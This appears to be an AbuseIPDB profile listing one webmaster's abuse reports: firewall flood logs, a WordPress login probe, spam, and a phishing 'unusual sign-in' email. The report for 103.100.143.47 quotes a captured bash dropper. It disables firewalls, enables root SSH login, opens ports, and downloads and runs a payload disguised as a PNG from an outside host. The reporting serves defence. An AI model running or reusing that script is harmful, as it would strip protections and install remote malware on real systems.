User cclmed, the webmaster of cclmed.ro, joined AbuseIPDB in November 2020 and has reported 10 IP addresses. Standing (weight) is good.
INACTIVE USER
WEBMASTER
SUPPORTER
IP
Date
Comment
Categories
185.53.199.57
20 Aug 2021
2021-08-20T04:30:30+03:00 <warning>kernel: [1596276.584726] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=185.53.199.57 DST=86.123.254.215 LEN=124 TOS=0x18 PREC=0x20 TTL=51 ID=5681 DF PROTO=UDP SPT=9140 DPT=61724 LEN=104 MARK=0xff00
2021-08-20T04:30:30+03:00 <warning>kernel: [1596276.585386] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=185.53.199.57 DST=86.123.254.215 LEN=124 TOS=0x18 PREC=0x20 TTL=51 ID=5680 DF PROTO=UDP SPT=8577 DPT=63296 LEN=104 MARK=0xff00
DDoS Attack
Port Scan
103.100.143.47
08 Aug 2021
#!/bin/bash
#chkconfig: 2345 88 14
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function downloadyam() {
/etc/init.d/iptables stop
service iptables stop
sUsEFirewall2 stopresUsEFirewall2 stop
systemctl stop firewalld.service
systemctl disable firewalld.service
sed -i '/nameserver*/d' /etc/resolv.conf
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
needreset=1;
iptables -I INPUT -p TCP --dport 1522 -j ACCEPT
iptables -I INPUT -p TCP --dport 3307 -j ACCEPT
iptables -I INPUT -p TCP --dport 6001 -j ACCEPT
sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
sed -i '/PermitRootLogin*/d' /etc/ssh/sshd_config
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
if [ ! -f "/bin/note" ]; then
curl http://xia.beihaixue.com/s666.png -o /bin/note && chmod 0777 /bin/note
if [ ! -f "/bin/note" ]; then
wget http://xia.beihaixue.com/s666.png -O /bin/note && chmod 0777 /bin/note
rm -rf note.*
fi
nohup /bin/note &
Phishing
Hacking
Exploited Host
SSH
106.75.34.62
26 Jun 2021
Unusual sign-in activity
We detected something unusual about a recent sign-in to the effybiz.com account [email protected]
Sign-in details
Country/region: Singapore
IP address: 92.922.140.701
Date: 2021-06-21 8:41:59 GMT (SG)
Platform: iOS
Browser: - Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0)
Please go to your recent activity page to let us know whether or not this was you. If this wasn't you, we'll help you to secure your account. If this was you, we'll trust similar activity in the future.
Email Spam
103.145.13.223
07 Jun 2021
2021-06-07T04:29:05+03:00 <warning>kernel: [1513982.263667] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=103.145.13.223 DST=86.123.254.215 LEN=429 TOS=0x08 PREC=0x20 TTL=53 ID=24028 DF PROTO=UDP SPT=5097 DPT=5382 LEN=409 MARK=0xff00
DDoS Attack
Port Scan
81.211.5.146
10 May 2021
2021-05-04T00:42:23+03:00 <warning>kernel: [1068017.733040] FIREWALL ICMP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=81.211.5.146 DST=86.123.254.215 LEN=56 TOS=0x00 PREC=0x00 TTL=249 ID=0 PROTO=ICMP TYPE=11 CODE=0 [SRC=86.123.254.215 DST=91.243.35.12 LEN=41 TOS=0x00 PREC=0x00 TTL=1 ID=54575 DF PROTO=UDP SPT=19046 DPT=7777 LEN=21 ] MARK=0xff00
Numerous ICMP flood attacks
DDoS Attack
Ping of Death
Exploited Host
51.195.190.14
10 May 2021
2021-05-10T00:48:35+03:00 <warning>kernel: [1586805.515996] FIREWALL SYN-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=51.195.190.14 DST=86.123.254.215 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=24481 PROTO=TCP SPT=56914 DPT=8430 WINDOW=1024 RES=0x00 SYN URGP=0 MARK=0xff00
This repeats multiple times per second at the main gateway
DDoS Attack
Exploited Host
162.241.149.137
16 Feb 2021
162.241.149.137 - - [16/Feb/2021:08:33:30 +0200] "GET /wp-login.php HTTP/1.1" 404 6568 "http://cclmed.ro/wp-login.php" "Mozilla/5.0(Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
Web App Attack
63.80.191.81
30 Nov 2020
Continuous unsolicited marketing email for various products (possibly scam)
Email Spam
178.20.226.92
30 Nov 2020
Continuous unsolicited marketing emails for various products
Email Spam